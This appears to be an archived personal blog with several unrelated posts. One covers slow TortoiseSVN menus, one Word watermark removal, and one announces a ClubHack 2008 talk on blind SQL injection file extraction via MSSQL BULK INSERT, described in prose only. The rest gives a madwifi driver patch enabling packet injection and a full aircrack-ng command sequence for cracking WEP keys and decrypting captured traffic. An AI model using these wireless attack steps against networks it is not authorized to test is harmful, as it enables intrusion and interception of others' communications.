Ever since I installed Tortoise SVN I saw that the right-clicks on my Windows XP SP2 had been terribly slow. It seems like Tortoise performs a whole lot of caching. Every time you right click all the cache entries are browsed and updates are sought. Although, the interface provides ways to disable this overlay caching, it seemed to me that the caching was being performed regardless. I had to uninstall the client to restore the sanity of my right-clicks. I guess software designers should make design decisions such that the UI responsiveness is not compromised for Windows Shell extensions.

Jay Kelath and I will be presenting at ClubHack 2008. Our topic is “Snake in the Eagle’s Shadow: Blind SQL Injection” and it is about using Blind SQL Injection on Oracle, MSSQL (and possibly MySQL) to get content of remote databases and also using out of band mechanisms on Oracle database and blind sql injection to pilfer database information.
I’ve also written up a tool that I’ll be presenting with Jay to show how to exploit blind SQL injection to remotely download files. The technique I’m presenting is different from the time delay techniques as have been presented in the past using the waitfor delay statements. Traditionally, using the waitfor delay statement one can download database contents as was shown using tools such as Absinthe, SQLBrute, Blind SQL Brute Forcer. I just try to automate the “virtual” file downloading using BULK insert on MSSQL Server and download files. To do this you do not need any firewall allowances. The technique I use is if you can “infer” every byte of a file then you don’t need to download the file using a TCP connection, you can re-create the file yourself (you already know every byte of the file). The only limitation being that the data rates are pretty slow using this technique. However, since you do not rely on time delays it’s still faster than time delay techniques.

Using watermarks in word documents looks really cool. But the problem occurs when the documents become too big. In such cases, the document becomes exceedingly slow to react to scrolling. Adobe PDF conversion is an even bigger problem.
To remove the watermark it is simple enough : Format -> Background -> Printed Watermark. Then click on “No watermark” and you are golden (or you should be golden).
I’ve observed that the watermark does not get removed many times when you have too many sections in the document.
In such cases: Goto View -> Header and Footer. Click on “Show/Hide Document Text”.
You should see that all your text has disappeared except the watermark. Click on the watermark and you should be able to select it like a floating image. Press the “delete” key and lo! behold! the watermark is gone.
This took me a while to figure out and it was quite frustrating. I hope this post helps someone!

Copy paste the text shown below into a file called madwifing-r3876.patch.

--- madwifi/ath/if_ath.c  2008-11-07 01:05:07.000000000 -0500
+++ madwifi-patched/ath/if_ath.c   2008-11-06 17:56:59.000000000 -0500
@@ -3000,6 +3000,7 @@
 ath_tx_startraw(struct net_device *dev, struct ath_buf *bf, struct sk_buff *skb)
 {
        struct ath_softc *sc = dev->priv;
+       struct ieee80211com *ic = &sc->sc_ic;
        struct ath_hal *ah = sc->sc_ah;
        struct ieee80211_phy_params *ph = &(SKB_CB(skb)->phy);
        const HAL_RATE_TABLE *rt;
@@ -3012,7 +3013,8 @@
        struct ieee80211_frame *wh;

        wh = (struct ieee80211_frame *)skb->data;
-       try0 = ph->try[0];
+       //try0 = ph->try[0];
+        try0 = (ic->ic_opmode == IEEE80211_M_MONITOR) ? 1 : ph->try[0];
        rt = sc->sc_currates;
        txrate = dot11_to_ratecode(sc, rt, ph->rate[0]);
        power = ph->power > 60 ? 60 : ph->power;
@@ -3036,7 +3038,8 @@
        rt = sc->sc_currates;
        KASSERT(rt != NULL, ("no rate table, mode %u", sc->sc_curmode));

-       if (IEEE80211_IS_MULTICAST(wh->i_addr1)) {
+       //if (IEEE80211_IS_MULTICAST(wh->i_addr1)) {
+        if (IEEE80211_IS_MULTICAST(wh->i_addr1) || ((ic->ic_opmode == IEEE80211_M_MONITOR) && (skb->data[1]&3) != 0x01) ) {
          flags |= HAL_TXDESC_NOACK;    /* no ack on broad/multicast */
          sc->sc_stats.ast_tx_noack++;
          try0 = 1;

Check out the madwifi driver as follows:

sudo ifconfig ath0 down
sudo ifconfig wifi0 down
svn -r 3876 checkout http://svn.madwifi.org/madwifi/trunk/ madwifi-ng
cd madwifi-ng
patch -Np1 -i ../madwifing-r3876.patch
sudo ./scripts/madwifi-unload
make
sudo make install
sudo depmod -ae
sudo modprobe ath_pci

These instructions are similar to the ones written here (for a different revision):
http://www.aircrack-ng.org/doku.php?id=madwifi-ng

If you want to crack WEP keys of an AP that is using WEP.

The following steps should be performed:

Start Capturing packets first:
sudo airodump-ng –bssid <APMAC> -w <CAPTUREFILE> –channel <CHANNELNUM> <IFACE>

Start capturing ARP packets:
sudo aireplay-ng –arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE>

Send deauth packets:
sudo aireplay-ng –deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> -e <ESSID> <IFACE>

Send fakeauth packets:
sudo aireplay-ng –fakeauth 5 -e <ESSID> -b <APMAC> -h <ASSOCCLIENTMAC> <IFACE>

Cracking WEP:
aircrack-ng -e <ESSID> -b <APMAC> -n <BITSIZE> -f <FUDGEFACTOR> <CAPTUREFILE>

The fudge factor is a measure of how much randomness to check for. I am not exactly sure of its cryptographic significance, however, it may make the difference between cracking a WEP key and not.

Sometimes you may have an AP with no clients connected to it. In such cases, follow the instructions at the following URL:
How to crack WEP with no clients.

Once the WEP keys are obtained then use airdecap-ng to decrypt the packets:
airdecap-ng -b <APMAC> -e <ESSID> -w <KEY> <PCAPFILE>
tcpdump -r <PCAPFILE>-dec.cap